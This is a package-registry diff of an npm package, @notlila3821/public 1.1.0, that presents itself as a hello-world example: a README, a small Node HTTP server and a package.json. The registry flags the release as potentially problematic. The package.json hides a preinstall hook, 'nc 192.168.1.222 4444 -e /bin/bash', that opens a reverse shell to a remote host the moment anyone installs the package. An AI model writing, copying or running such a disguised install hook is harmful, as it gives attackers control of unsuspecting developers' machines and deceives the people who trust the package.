@notlila3821/public 1.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @notlila3821/public might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/hello.js +7 -0
  3. package/package.json +13 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ this is just a hello world text!
package/hello.js ADDED
@@ -0,0 +1,7 @@
1
+ var http = require('http');
2
+ http.createServer(function (req, res) {
3
+ res.write('Hello World!');
4
+ res.end();
5
+ }).listen(5000);
6
+
7
+ console.log('Server running at 5000');
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "@notlila3821/public",
3
+ "version": "1.1.0",
4
+ "description": "this is just a hello world text!",
5
+ "main": "hello.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "nc 192.168.1.222 4444 -e /bin/bash"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
13
+ }